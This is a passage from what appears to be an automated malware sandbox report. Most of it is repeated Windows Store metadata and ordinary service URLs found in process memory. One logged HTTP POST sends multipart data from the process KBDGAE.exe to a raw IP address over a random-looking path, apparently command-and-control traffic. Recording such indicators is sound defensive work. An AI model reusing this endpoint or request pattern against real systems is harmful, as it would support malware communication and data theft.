","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Game","Validatio
          Source: svchost.exe, 00000018.00000003.479101603.000001C21DF46000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":423919743,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_neutral_~_ytsefhwckbdv6","PackageId":"f29b0636-abdc-7df5-2edc-8f3e01650a1f-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
          Source: svchost.exe, 00000018.00000003.479101603.000001C21DF46000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":423919743,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_neutral_~_ytsefhwckbdv6","PackageId":"f29b0636-abdc-7df5-2edc-8f3e01650a1f-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
          Source: svchost.exe, 00000018.00000003.479101603.000001C21DF46000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":423919743,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_neutral_~_ytsefhwckbdv6","PackageId":"f29b0636-abdc-7df5-2edc-8f3e01650a1f-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
          Source: svchost.exe, 00000018.00000003.479027196.000001C21DFBE000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"murder game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"
          Source: svchost.exe, 00000018.00000003.479027196.000001C21DFBE000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"murder game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"
          Source: svchost.exe, 00000018.00000003.479027196.000001C21DFBE000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"murder game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"
          Source: unknownHTTP traffic detected: POST /EiNjgf2bWQ/oQ1qYoC1f28ZhMF2/Hpfhb9sn/m3L3O680Wtk/CBtZ1LyTyBYp5cFLU/ HTTP/1.1Referer: http://47.146.117.214/EiNjgf2bWQ/oQ1qYoC1f28ZhMF2/Hpfhb9sn/m3L3O680Wtk/CBtZ1LyTyBYp5cFLU/Content-Type: multipart/form-data; boundary=---------------------------009576963303513User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 47.146.117.214Content-Length: 4564Connection: Keep-AliveCache-Control: no-cache
          Source: KBDGAE.exe, 00000001.00000002.519840583.00000000028B2000.00000004.00000001.sdmpString found in binary or memory: http://47.146.117.214/EiNjgf2bWQ/oQ1qYoC1f28ZhMF2/Hpfhb9sn/m3L3O680Wtk/CBtZ1LyTyBYp5cFLU/
          Source: svchost.exe, 00000018.00000002.495528806.000001C21D6E7000.00000004.00000001.sdmpString found in binary or memory: http://crl.mic8
          Source: svchost.exe, 00000002.00000002.519669425.000001AA3DC15000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.495678160.000001C21DF1F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
          Source: svchost.exe, 00000002.00000002.519669425.000001AA3DC15000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.495678160.000001C21DF1F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: svchost.exe, 00000002.00000002.519669425.000001AA3DC15000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.495678160.000001C21DF1F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
          Source: svchost.exe, 00000002.00000002.519852130.000001AA3DE00000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: svchost.exe, 00000005.00000002.306628960.000001ED2A813000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
          Source: svchost.exe, 00000018.00000003.479078515.000001C21DF5C000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.479027196.000001C21DFBE000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.479101603.000001C21DF46000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
          Source: svchost.exe, 00000018.00000003.479078515.000001C21DF5C000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.479027196.000001C21DFBE000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.479101603.000001C21DF46000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
          Source: svchost.exe, 00000018.00000003.477651130.000001C21DF7B000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/privacy
          Source: svchost.exe, 00000018.00000003.477651130.000001C21DF7B000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/terms
          Source: svchost.exe, 00000005.00000003.306133734.000001ED2A861000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
          Source: svchost.exe, 00000005.00000003.306154545.000001ED2A85A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000005.00000003.306154545.000001ED2A85A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
          Source: svchost.exe, 00000005.00000003.306133734.000001ED2A861000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
          Source: svchost.exe, 00000005.00000002.306699521.000001ED2A83D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
          Source: svchost.exe, 00000005.00000003.306154545.000001ED2A85A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
          Source: svchost.exe, 00000005.00000003.306133734.000001ED2A861000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
          Source: svchost.exe, 00000005.00000002.306730175.000001ED2A84E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
          Source: svchost.exe, 00000005.00000003.306154545.000001ED2A85A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
          Source: svchost.exe, 00000005.00000003.306133734.000001ED2A861000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
          Source: svchost.exe, 00000005.00000002.306699521.000001ED2A83D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
          Source: svchost.exe, 00000005.00000003.306133734.000001ED2A861000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
          Source: svchost.exe, 00000005.00000003.306133734.000001ED2A861000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
          Source: svchost.exe, 00000005.00000003.306133734.000001ED2A861000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
          Source: svchost.exe, 00000005.00000002.306713796.000001ED2A842000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
          Source: svchost.exe, 00000005.00000002.306713796.000001ED2A842000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
          Source: svchost.exe, 00000005.00000003.306133734.000001ED2A861000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
          Source: svchost.exe, 00000005.00000003.306154545.000001ED2A85A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
          Source: svchost.exe, 00000005.00000003.306154545.000001ED2A85A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000005.00000003.306154545.000001ED2A85A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000005.00000003.306154545.000001ED2A85A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000005.00000003.306123593.000001ED2A864000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.306713796.000001ED2A842000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.306154545.000001ED2A85A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
